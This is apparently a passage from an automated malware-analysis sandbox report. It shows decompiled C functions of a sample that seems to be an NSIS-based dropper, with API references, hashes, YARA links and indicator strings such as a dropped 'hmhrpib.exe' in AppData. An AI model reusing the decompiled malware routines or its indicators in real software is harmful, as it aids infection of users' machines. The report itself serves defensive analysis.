              0x00401dad
              0x00401db0
              0x00401db8
              0x00401dc9
              0x00401dcc
              0x00401dd7
              0x00401dce
              0x00401dd0
              0x00401dd0
              0x00401ddb
              0x00401de5
              0x00401e0c
              0x00401e1b
              0x00401e29
              0x00401e31
              0x00401e39
              0x00401e39
              0x00401e42
              0x00401e48
              0x00402b08
              0x00402b08
              0x00402bc5
              0x00402bd1

              APIs
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
              • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
              • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401E4E, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
              Download Yara Rule
              C-Code - Quality: 73%
              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D1C(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D1C(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E00406579(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E00406483();
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











              0x00401e4e
              0x00401e59
              0x00401e5b
              0x00401e68
              0x00401e7f
              0x00401e84
              0x00401e91
              0x00401e96
              0x00401e9a
              0x00401ea5
              0x00401eac
              0x00401ebe
              0x00401ec4
              0x00401ec9
              0x00401ed3
              0x00402630
              0x0040156d
              0x00402b08
              0x00402bc5
              0x00402bd1

              APIs
              • GetDC.USER32(?), ref: 00401E51
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
              • ReleaseDC.USER32 ref: 00401E84
              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CapsCreateDeviceFontIndirectRelease
              • String ID:
              • API String ID: 3808545654-0
              • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
              • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
              • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401C43, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D1C(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D1C(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402D3E(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402D3E(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402D3E();
					_t32 = E00402D3E();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D1C();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D1C(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406483();
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















              0x00401c43
              0x00401c45
              0x00401c4c
              0x00401c4f
              0x00401c52
              0x00401c5c
              0x00401c60
              0x00401c63
              0x00401c6c
              0x00401c6c
              0x00401c6f
              0x00401c73
              0x00401c7c
              0x00401c7c
              0x00401c7f
              0x00401c83
              0x00401c85
              0x00401cda
              0x00401cdc
              0x00401ce7
              0x00401cf1
              0x00401cf4
              0x00401cf4
              0x00401cfd
              0x00000000
              0x00401c87
              0x00401c8e
              0x00401c90
              0x00401c93
              0x00401c99
              0x00401ca0
              0x00401ca3
              0x00401ccb
              0x00401d03
              0x00401d03
              0x00401ca5
              0x00401cb3
              0x00401cbb
              0x00401cbe
              0x00401cbe
              0x00401ca3
              0x00401d06
              0x00401d09
              0x00401d0f
              0x00402b08
              0x00402b08
              0x00402bc5
              0x00402bd1

              APIs
              • SendMessageTimeoutW.USER32 ref: 00401CB3
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
              • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
              • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405E11, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 58%
              			E00405E11(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}




              0x00405e12
              0x00405e1f
              0x00405e20
              0x00405e2b
              0x00405e33
              0x00405e33
              0x00405e3b

              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-3081826266
              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
              • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403B19, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403B19() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x354
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x350
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403B76();
				return E00405C4E(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsb1C63.tmp", 7);
			}






              0x00403b19
              0x00403b28
              0x00403b2b
              0x00403b2d
              0x00403b2d
              0x00403b34
              0x00403b3c
              0x00403b3f
              0x00403b41
              0x00403b41
              0x00403b41
              0x00403b48
              0x00403b5a

              APIs
              • CloseHandle.KERNEL32(00000354,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
              • CloseHandle.KERNEL32(00000350,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
              Strings
              • C:\Users\user\AppData\Local\Temp\nsb1C63.tmp, xrefs: 00403B4F
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseHandle
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb1C63.tmp
              • API String ID: 2962429428-455956682
              • Opcode ID: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
              • Opcode Fuzzy Hash: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
              • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405F19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E00405F19(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653C(0x425f50, _a4);
				_t21 = E00405EBC(0x425f50);
				if(_t21 != 0) {
					E004067EB(_t21);
					if(( *0x42a27c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040689A();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E5D(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E11();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








              0x00405f25
              0x00405f30
              0x00405f34
              0x00405f3b
              0x00405f47
              0x00405f57
              0x00405f59
              0x00405f71
              0x00405f72
              0x00405f79
              0x00405f7a
              0x00000000
              0x00000000
              0x00405f5d
              0x00405f64
              0x00405f6c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405f64
              0x00405f7c
              0x00000000
              0x00405f90
              0x00405f49
              0x00405f4f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405f4f
              0x00405f36
              0x00000000

              APIs
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405F72
              • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560), ref: 00405F82
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharNext$AttributesFilelstrcpynlstrlen
              • String ID: P_B
              • API String ID: 3248276644-906794629
              • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
              • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
              • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405518, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
              Download Yara Rule
              C-Code - Quality: 89%
              			E00405518(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404ECD();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E4D(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044DE(0x413);
				return 0;
			}





              0x0040551c
              0x00405526
              0x00405542
              0x00405564
              0x00405567
              0x0040556d
              0x00405577
              0x00405578
              0x0040557a
              0x00405580
              0x00405580
              0x0040558a
              0x00000000
              0x00405598
              0x0040554f
              0x00405587
              0x00405587
              0x00000000
              0x00405587
              0x0040555b
              0x0040555d
              0x00000000
              0x0040555d
              0x0040552c
              0x00000000
              0x00000000
              0x00405533
              0x00000000

              APIs
              • IsWindowVisible.USER32(?), ref: 00405547
              • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
              • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
              • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040640A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E0040640A(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063A9(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







              0x00406418
              0x0040641a
              0x00406432
              0x00406437
              0x0040643c
              0x0040647a
              0x0040647a
              0x0040643e
              0x00406450
              0x0040645b
              0x00406461
              0x0040646c
              0x00000000
              0x00000000
              0x0040646c
              0x00406480

              APIs
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,KXCJDFJSKF,?,?,00406699,80000002), ref: 00406450
              • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,KXCJDFJSKF,KXCJDFJSKF,KXCJDFJSKF,00000000,00422728), ref: 0040645B
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseQueryValue
              • String ID: KXCJDFJSKF
              • API String ID: 3356406503-1579689790
              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405B25, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405B25(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





              0x00405b2e
              0x00405b4e
              0x00405b56
              0x00405b5b
              0x00000000
              0x00405b61
              0x00405b65

              APIs
              Strings
              • Error launching installer, xrefs: 00405B38
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: Error launching installer
              • API String ID: 3712363035-66219284
              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
              • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405E5D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00405E5D(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





              0x00405e5e
              0x00405e68
              0x00405e6b
              0x00405e71
              0x00405e72
              0x00405e73
              0x00405e7b
              0x00000000
              0x00000000
              0x00000000
              0x00405e7b
              0x00405e7d
              0x00405e85

              APIs
              • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming\tteegmiuoefs,004030D4,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00405E63
              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Roaming\tteegmiuoefs,004030D4,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe,80000000,00000003), ref: 00405E73
              Strings
              • C:\Users\user\AppData\Roaming\tteegmiuoefs, xrefs: 00405E5D
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\user\AppData\Roaming\tteegmiuoefs
              • API String ID: 2709904686-1622495906
